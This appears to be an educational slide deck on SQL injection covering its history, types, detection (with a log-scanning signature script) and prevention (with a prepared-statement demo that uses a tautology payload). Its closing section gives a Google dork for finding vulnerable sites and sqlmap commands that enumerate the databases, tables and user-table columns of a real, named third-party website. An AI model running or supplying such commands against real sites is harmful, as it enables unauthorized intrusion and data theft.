SQL INJECTION
AJU MATHEW THOMAS
What is SQL Injection
• A technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a web application for execution by a backend database.
• The basic objective is to pull the database information existing behind a web server, which will contain information about the website such as usernames, passwords, admin details and other relevant information related to the website.
• It is an exploit that a hacker uses to gather information from a database.
Overview – Cont.
• Hackers can use SQL injection to add, modify and delete records in the database.
• Gives an adversary complete control over the web application database.
• It can affect any web application that uses an SQL database, such as MySQL, Oracle, SQL Server etc.
• Considered one of the most prevalent and most dangerous web application vulnerabilities.
• It is also listed as one of the top ten web application vulnerabilities in the OWASP Top Ten.
Injection Mechanism
• Injection mechanisms are mainly of two types: (i) first-order injection and (ii) second-order injection.
• First-order injection vectors: (i) injection through user inputs, (ii) injection through cookies, (iii) injection through server variables.
• First-order injection: the application processes the input and causes the attacker's injected SQL query to execute.
• Second-order injection: the application stores the user input for future use and responds to the request. When the attacker submits a second request, the application retrieves the stored input and processes it, causing the attacker's injected SQL query to execute.
History of SQLI
• SQL injection was first discovered in 1998.
• Jeff Forristal was one of the first people to ever document SQL injection.
• A few exploits recorded in the past:
(1) CVE-2019-1010248 – Synetics GmbH i-doit 1.12 and earlier was affected by SQL injection. The impact was unauthenticated access to the MySQL database. The affected component was a web login form. The attack vector is sending a malicious HTTP POST request.
(2) CVE-2019-1010259 – SaltStack Salt 2018.3, 2019.2 – an attacker could escalate privileges on the MySQL server deployed by the cloud server. It leads to RCE.
History of SQLI Attacks
• SQLI attacks have been predominant since their inception, and many attacks in the past were due to SQLI and caused huge losses to many organizations.
• Starbucks attack, Aug 2019 – A critical SQL injection vulnerability existed on a Starbucks enterprise database that may have exposed internal financial and accounting records. The vulnerability was discovered through a vulnerability discovery program run by HackerOne on behalf of Starbucks. The vulnerability could give access to taxes, receipts, payroll data and all other information held on the exposed accounting database.
History of SQLI Attacks (Cont.)
• Sony Music attacks, May 2011 – A group of hackers performed SQL injection attacks to expose sensitive user records on Sony Music Japan and also on Sony BMG Greece on May 21, 2011.
• Two PHP pages on the Sony Music Japan site were vulnerable to SQL injection.
• Data leaked from the attack on Sony BMG Greece included usernames, real names and email addresses of users registered on the SonyMusic.gr site. This attack appears to have used an automated SQL injection tool to find the flaw.
• The database information that was published from Sony Music Japan did not contain names, passwords or other personally identifiable information.
History of SQLI Attacks (Cont.)
• An SQL injection attack was used to steal the personal details of 156,959 customers from the British telecommunications company TalkTalk's servers, exploiting a vulnerability in a legacy web portal.
Types of SQL Injections
• SQL injections typically fall into three categories: (i) in-band SQLi (classic), (ii) inferential SQLi (blind) and (iii) out-of-band SQLi.
• In-band SQLi: the attacker uses the same channel of communication to launch the attack and to gather results. The two sub-variants are:
o Error-based SQLi – performs actions that cause the database to produce error messages. The attacker can potentially use the data provided by these error messages to gather information about the structure of the database.
o Union-based SQLi – uses the UNION SQL operator, which fuses the results of multiple SELECT statements generated by the database into a single HTTP response.
Types of SQL Injections
• Blind SQLi: used when a web application is vulnerable to SQL injection but the results of the injection are not visible to the attacker.
• The vulnerable page may not be one that displays data, but it will display differently depending on the result of a logical statement injected into the legitimate SQL statement called for that page.
• Out-of-band SQLi: this attack can be used only when certain features are enabled on the database server used by the web application. Out-of-band SQLi is performed when the attacker can't use the same channel to launch the attack and gather information, or when a server is too slow or unstable for these actions to be performed.
Detection of SQL Injection
• Detection is an important component of mitigating the risk of SQL injection attacks.
• A WAF (Web Application Firewall) can detect and block basic SQL injection attacks.
• IDS (both network- and host-based) can be tuned to detect SQL injection attacks.
• Network-based IDSes can monitor all connections to your database server and flag suspicious activity.
• Host-based IDSes can monitor web server logs and alert when something strange happens.
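As an added example of the host-based log monitoring point above (this code is not part of the original slides), the Python below scans Apache-style access-log lines for the query-string traces that the in-band variants described on the earlier slides leave behind: a stray quote (often paired with a 5xx error response in error-based SQLi), a comment sequence, a UNION SELECT, or a tautology. The log lines, request paths and signature list are constructed for the demonstration and are assumptions, not data from the slides.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache-style access-log lines (not from the original slides).
# Lines 2, 3 and 5 carry the kinds of query strings the slides describe;
# lines 1 and 4 are ordinary requests and must not be flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:10:01:02 +0000] "GET /products.php?id=1 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Mar/2024:10:01:09 +0000] "GET /products.php?id=1%27 HTTP/1.1" 500 612
203.0.113.7 - - [10/Mar/2024:10:01:15 +0000] "GET /products.php?id=1%20UNION%20SELECT%20NULL,NULL-- HTTP/1.1" 200 4980
198.51.100.4 - - [10/Mar/2024:10:02:30 +0000] "GET /news.php?id=42 HTTP/1.1" 200 2210
198.51.100.4 - - [10/Mar/2024:10:02:41 +0000] "GET /login.php?user=admin%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 310
"""

# Common Log Format: client, identd, user, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)'
)

# Patterns that rarely occur in benign query strings. They are checked against
# the URL-decoded query so that %27 (') and %20 (space) cannot hide a payload.
SIGNATURES = [
    ("quote", re.compile(r"'")),
    ("sql_comment", re.compile(r"--|/\*")),
    ("union_select", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    # OR 1=1, OR '1'='1', OR a=a ... : the same token on both sides of '='
    ("tautology", re.compile(r"\bor\b\s*'?(\w+)'?\s*=\s*'?\1'?", re.I)),
]


def scan_line(line: str):
    """Return an alert dict for one log line, or None if nothing is suspicious."""
    m = LOG_RE.match(line)
    if not m or "?" not in m.group("path"):
        return None
    query = unquote_plus(m.group("path").split("?", 1)[1])
    hits = [name for name, pattern in SIGNATURES if pattern.search(query)]
    if not hits:
        return None
    status = int(m.group("status"))
    return {
        "ip": m.group("ip"),
        "path": m.group("path"),
        "decoded": query,
        "status": status,
        "hits": hits,
        # A quote that produced a server error is the classic error-based footprint.
        "error_response": status >= 500,
    }


def scan_log(text: str):
    """Scan every line of an access log and return the alerts in log order."""
    return [alert for alert in (scan_line(l) for l in text.splitlines()) if alert]


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ip"], alert["status"], alert["hits"], alert["decoded"])
```

Signature scanning of this kind is a first-pass filter rather than a verdict: a quote in a legitimate search term will trigger it, so in practice the alert would be correlated with the response status, request rate per client and the database server's own error log before anyone acts on it.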
Prevention of SQL Injection Attacks
• Sanitize database inputs. Any input to the web application database should be considered untrustworthy and dealt with accordingly.
• Developers must follow the principle of whitelisting (allow-listing) in input validation.
• Use prepared statements with parameterized queries, and escape all user-supplied input.
• Limit the account privileges of the database user. Give the web application only the minimum privileges it needs to run.
• Stored procedures can also make SQLI a lot harder.
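As an added illustration of the prepared-statement and whitelisting advice above, and of the first-order versus second-order mechanisms from the Injection Mechanism slide, here is a small Python example that is not part of the original slides. It uses an in-memory SQLite table; the table layout, the login/profile functions and the inputs are constructed assumptions for the demonstration. The point it makes is that binding parameters defends both the immediate (first-order) query and the later query that reuses stored data (second-order), while an allow-list rejects the payload before it reaches the database at all.

```python
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the web application's backend database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


# First-order injection: untrusted input is concatenated straight into the query,
# so quote characters in the input become part of the SQL syntax.
def login_vulnerable(conn, username, password):
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return [row[0] for row in conn.execute(sql)]


# Hardened form: a prepared statement with bound parameters. The driver passes the
# input as data, so the same quotes can never change the structure of the query.
def login_safe(conn, username, password):
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


# Whitelist (allow-list) validation: accept only the characters a username may
# contain, instead of trying to enumerate what an attack looks like.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{1,32}$")


def is_valid_username(username: str) -> bool:
    return USERNAME_RE.fullmatch(username) is not None


# Second-order injection: registration stores the input safely (bound parameter),
# so nothing happens now. The stored value only becomes dangerous when a later
# request builds a new query by concatenating it.
def register(conn, username) -> int:
    cur = conn.execute(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        (username, "placeholder", "user"),
    )
    return cur.lastrowid


def profile_vulnerable(conn, user_id):
    stored = conn.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchone()[0]
    sql = "SELECT role FROM users WHERE username = '" + stored + "'"   # concatenated again
    return [row[0] for row in conn.execute(sql)]


def profile_safe(conn, user_id):
    stored = conn.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchone()[0]
    return [row[0] for row in conn.execute("SELECT role FROM users WHERE username = ?", (stored,))]


def demo() -> dict:
    """Run the vulnerable and hardened paths against constructed tautology inputs."""
    conn = make_db()
    payload = "' OR '1'='1"   # constructed input; the slides describe this class of logical statement
    results = {
        "first_order_vulnerable": login_vulnerable(conn, payload, payload),  # every user
        "first_order_safe": login_safe(conn, payload, payload),              # no user
        "whitelist_rejects_payload": not is_valid_username(payload),
        "whitelist_accepts_normal": is_valid_username("alice_01"),
    }
    new_id = register(conn, "carol' OR '1'='1")   # stored verbatim, harmlessly, by the bound INSERT
    results["second_order_vulnerable"] = profile_vulnerable(conn, new_id)  # every role leaks
    results["second_order_safe"] = profile_safe(conn, new_id)              # only carol's role
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The second-order case is the one that input sanitization at the entry point tends to miss: the registration form can be perfectly validated and the data still reaches a concatenated query later, which is why every query in the application, not only the ones that read request parameters, should use bound parameters.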
SQL Injection Attacks using sqlmap
• sqlmap: an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.
• PHP ID vulnerability: websites that take a PHP "id" parameter are more prone to SQL injection attacks. Search engines like Google can index websites that contain the string "php?id=1" in the URL. Attackers can make use of this to perform SQLI attacks.
• Type the following line in Google search: "inurl: php?id=1". It will list all URLs that contain the above phrase.
• A website can be checked for SQLI vulnerability by appending a ' symbol at the end of the URL. If the content changes, it indicates that the site is prone to SQL injection attacks.
Working of sqlmap
• Open a terminal and type the command sqlmap -h to see the list of available options.
• Type the command: sqlmap -u http://www.pha.org.pk/sro_list.php?catid=1 --dbs
• Here -u: the URL of the website
• --dbs: list all the available databases related to the website
• To get the tables: sqlmap -u http://www.pha.org.pk/sro_list.php?catid=1 -D pha --tables
• To get the columns: sqlmap -u http://www.pha.org.pk/sro_list.php?catid=1 -D pha -T cp_user --columns
Bibliography
1) https://portswigger.net/daily-swig/sql-injection-flaw-opened-doorway-to-starbucks-accounting-database
2) https://www.csoonline.com/article/3257429/what-is-sql-injection-how-sqli-attacks-work-and-how-to-prevent-them.html
3) https://www.eweek.com/blogs/security-watch/sony-woes-continue-with-sql-injection-attacks
4) CEH module V9 on SQL Injection
5) Hackersploit – SQL Injection: https://www.youtube.com/watch?v=3ZFblGx5v94
6) https://www.vice.com/en_us/article/aekzez/the-history-of-sql-injection-the-hack-that-will-never-go-away
7) SQL Injection for Beginners: https://www.youtube.com/watch?v=oWHKIiRGjtQ
8) https://www.cvedetails.com/vulnerability-list/opsqli-1/sql-injection.html
9) www.sqlmap.org
10) https://www.imperva.com/learn/application-security/sql-injection-sqli
11) https://en.wikipedia.org/wiki/SQL_injection
THANK YOU